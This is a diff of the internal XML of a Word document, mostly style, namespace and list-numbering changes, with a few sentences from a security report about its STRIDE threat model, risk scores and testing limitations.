         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -8430,10 +7050,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -8448,10 +7068,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -8466,10 +7086,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -8484,10 +7104,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -8497,13 +7117,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>This report and codebase have not been through an independent, live penetration test; the vulnerable-baseline files are illustrative of the specific findings named above, not an exhaustive audit.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
@@ -8533,67 +7152,30 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">The STRIDE threat model (Section 3) and risk register (Section 6) show every in-scope threat reduced from a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Likelihood×Impact</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> score of 4–19 down to 1–3, with the three explicitly out-of-scope risks (MFA, WAF/DDoS, automated scanning) carried forward as accepted risks with concrete recommendations rather than left unaddressed. Structured, redacted security-event logging and an incident-response runbook complete the defensive picture, giving the application both preventive controls and a documented response process for when those controls are tested in practice.</w:t>
+        <w:t>The STRIDE threat model (Section 3) and risk register (Section 6) show every in-scope threat reduced from a Likelihood×Impact score of 4–19 down to 1–3, with the three explicitly out-of-scope risks (MFA, WAF/DDoS, automated scanning) carried forward as accepted risks with concrete recommendations rather than left unaddressed. Structured, redacted security-event logging and an incident-response runbook complete the defensive picture, giving the application both preventive controls and a documented response process for when those controls are tested in practice.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId8"/>
-      <w:footerReference w:type="default" r:id="rId9"/>
+      <w:headerReference r:id="rId3" w:type="default"/>
+      <w:footerReference r:id="rId4" w:type="default"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
-      <w:cols w:space="720"/>
-      <w:docGrid w:linePitch="360"/>
+      <w:cols w:space="720" w:num="1"/>
+      <w:docGrid w:linePitch="360" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
 </file>
 
-<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:endnote w:type="separator" w:id="-1">
-    <w:p>
-      <w:r>
-        <w:separator/>
-      </w:r>
-    </w:p>
-  </w:endnote>
-  <w:endnote w:type="continuationSeparator" w:id="0">
-    <w:p>
-      <w:r>
-        <w:continuationSeparator/>
-      </w:r>
-    </w:p>
-  </w:endnote>
-</w:endnotes>
-</file>
-
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
   <w:p>
     <w:pPr>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
         <w:color w:val="888888"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
@@ -8602,16 +7184,16 @@
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
         <w:color w:val="888888"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:instrText>PAGE</w:instrText>
+      <w:instrText xml:space="preserve">PAGE</w:instrText>
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
         <w:color w:val="888888"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
@@ -8620,8 +7202,7 @@
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        <w:noProof/>
+        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
         <w:color w:val="888888"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
@@ -8630,7 +7211,7 @@
     </w:r>
     <w:r>
       <w:rPr>
-        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
         <w:color w:val="888888"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
@@ -8641,27 +7222,8 @@
 </w:ftr>
 </file>
 
-<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:footnote w:type="separator" w:id="-1">
-    <w:p>
-      <w:r>
-        <w:separator/>
-      </w:r>
-    </w:p>
-  </w:footnote>
-  <w:footnote w:type="continuationSeparator" w:id="0">
-    <w:p>
-      <w:r>
-        <w:continuationSeparator/>
-      </w:r>
-    </w:p>
-  </w:footnote>
-</w:footnotes>
-</file>
-
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
   <w:p>
     <w:pPr>
       <w:jc w:val="right"/>
@@ -8671,12 +7233,12 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 wp14">
+  <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="224453D7"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="44EC81E2"/>
-    <w:lvl w:ilvl="0" w:tplc="59B626E2">
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="224453D7"/>
+    <w:lvl w:ilvl="0" w:tentative="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="•"/>
@@ -8685,140 +7247,56 @@
         <w:ind w:left="431" w:hanging="215"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="15B65046">
+    <w:lvl w:ilvl="1" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="DE8C2D52">
+    <w:lvl w:ilvl="2" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="F028BFBA">
+    <w:lvl w:ilvl="3" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="DC5C6954">
+    <w:lvl w:ilvl="4" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="1E4E1B80">
+    <w:lvl w:ilvl="5" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="3E6C320E">
+    <w:lvl w:ilvl="6" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="8DC8A646">
+    <w:lvl w:ilvl="7" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="4CEEACAC">
+    <w:lvl w:ilvl="8" w:tentative="0">
+      <w:start w:val="0"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="687F0B06"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="4D46049A"/>
-    <w:lvl w:ilvl="0" w:tplc="02C23FB6">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="●"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="B4468AAC">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="○"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="7F66D446">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="■"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="1D4A013C">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="●"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="C4BE5CD4">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="○"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="B74A2BA4">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="■"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="9EEC312C">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="●"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="EA4AC09E">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="●"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="E9C6D804">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="●"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:num w:numId="1" w16cid:durableId="1139106562">
-    <w:abstractNumId w:val="1"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="1"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="2" w16cid:durableId="118955700">
+  <w:num w:numId="1">
     <w:abstractNumId w:val="0"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -8828,497 +7306,395 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
